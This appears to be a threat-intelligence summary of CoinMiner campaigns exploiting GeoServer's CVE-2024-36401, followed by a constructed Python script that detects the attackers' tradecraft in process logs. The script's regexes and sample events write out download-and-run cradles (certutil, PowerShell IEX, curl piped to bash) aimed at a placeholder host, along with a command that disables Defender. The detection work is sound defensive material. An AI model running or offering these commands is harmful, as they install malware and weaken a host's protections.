The activity centers on CVE-2024-36401, a remote code execution vulnerability in GeoServer disclosed in 2024 that lets unauthenticated attackers execute arbitrary commands on vulnerable instances. Since disclosure, multiple threat actors have systematically scanned for exposed, unpatched GeoServer deployments and used the flaw to launch PowerShell, Bash, and Windows-native utilities such as certutil to fetch and run malware.
Researchers observed three distinct CoinMiner infection patterns. Type A campaigns used PowerShell and Bash payloads to download batch or shell scripts that ultimately installed XMRig, reusing the same Monero wallet addresses across GeoServer and other exposed services such as WebLogic. Type B activity involved a more structured dropper fetched with certutil: a RAR SFX archive that unpacked a customized XMRig build disguised as Java binaries and registered it as a Windows service via NSSM. Type C campaigns combined CoinMiner deployment with additional tooling, including AnyDesk and a custom in-memory downloader, and attempted to disable or bypass Windows Defender to maintain long-term access.
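As an added triage example (not code from the original report or from any of the campaigns it describes), the script below scans process-creation events for the tradecraft summarized above: a shell or certutil spawned by a Java process (GeoServer runs inside a JVM, so post-exploitation commands start there), certutil -urlcache downloads, PowerShell and curl-pipe-to-shell cradles, NSSM service installs, Defender tampering, and a "java"-named binary running outside a normal JDK/JRE install path. Every log line, path, and hostname in it is constructed for the example; the event format (parent|image|command line) and the rule thresholds are assumptions, not the researchers' detection logic.

```python
"""Constructed triage check for GeoServer CoinMiner tradecraft.
Input format (assumed): one event per line, 'parent|image|commandline'.
All sample events below are constructed; example.invalid is a reserved
hostname and never resolves."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    parent: str
    image: str
    cmdline: str


# (rule name, regex applied to the command line); order determines hit order
RULES = [
    ("certutil_download", re.compile(r"certutil(?:\.exe)?\s.*-urlcache\b", re.I)),
    ("powershell_cradle", re.compile(
        r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|-enc(odedcommand)?\b)", re.I)),
    ("bash_cradle", re.compile(r"(curl|wget)\s[^|]*\|\s*(ba)?sh\b", re.I)),
    ("nssm_service_install", re.compile(r"\bnssm(?:\.exe)?\s+install\b", re.I)),
    ("defender_tamper", re.compile(
        r"(set|add)-mppreference\s.*-(disablerealtimemonitoring|exclusionpath)", re.I)),
]

# Locations where a genuine java/javaw binary is expected (assumed list)
JAVA_PATH_OK = re.compile(
    r"(program files(?: \(x86\))?\\(java|eclipse adoptium|zulu)|/usr/lib/jvm/|/opt/java)", re.I)
JAVA_IMAGE = re.compile(r"(^|[\\/])javaw?(\.exe)?$", re.I)
JAVA_PARENT = re.compile(r"java(\.exe)?$", re.I)
SHELL_IMAGE = re.compile(r"(cmd\.exe|powershell(\.exe)?|pwsh(\.exe)?|certutil(\.exe)?|/bin/sh|/bin/bash)$", re.I)


def parse_line(line):
    # maxsplit=2 keeps any '|' inside the command line (e.g. curl ... | bash)
    parent, image, cmdline = line.split("|", 2)
    return Event(parent.strip(), image.strip(), cmdline.strip())


def flag_event(ev):
    hits = [name for name, rx in RULES if rx.search(ev.cmdline)]
    # GeoServer's JVM spawning a shell or certutil is the exploitation pivot itself
    if JAVA_PARENT.search(ev.parent) and SHELL_IMAGE.search(ev.image):
        hits.append("java_spawned_shell")
    # Miner disguised as Java: java-named image outside a known install path
    if JAVA_IMAGE.search(ev.image) and not JAVA_PATH_OK.search(ev.image):
        hits.append("java_lookalike_path")
    return hits


def triage(lines):
    """Return {event line: [rule names]} for every line that fires a rule."""
    results = {}
    for line in lines:
        hits = flag_event(parse_line(line))
        if hits:
            results[line] = hits
    return results


# Constructed sample events (Windows and Linux GeoServer hosts)
SAMPLE_LOG = [
    r"C:\Tomcat\bin\java.exe|C:\Windows\System32\cmd.exe|cmd.exe /c certutil -urlcache -split -f http://example.invalid/dl.exe C:\Users\Public\dl.exe",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
    r"/usr/bin/java|/bin/sh|sh -c \"curl -fsSL http://example.invalid/x.sh | bash\"",
    r"C:\Users\Public\setup.exe|C:\Users\Public\nssm.exe|nssm.exe install JavaUpdate C:\ProgramData\Java\java.exe",
    r"C:\Windows\System32\services.exe|C:\ProgramData\Java\java.exe|java.exe -c config.json",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Set-MpPreference -DisableRealtimeMonitoring $true",
    r"C:\Windows\System32\services.exe|C:\Program Files\Java\jdk-17\bin\java.exe|java -jar geoserver.jar",
    r"explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt",
]

if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LOG).items():
        print(", ".join(hits), "<-", line[:80])
```

The legitimate GeoServer JVM under Program Files and the notepad event produce no hits; the other six each fire at least one rule. The java_spawned_shell rule is the one worth tuning first in a real deployment, since it catches the exploitation step before any particular payload is fetched, but it will also fire on administrative scripts launched from Tomcat.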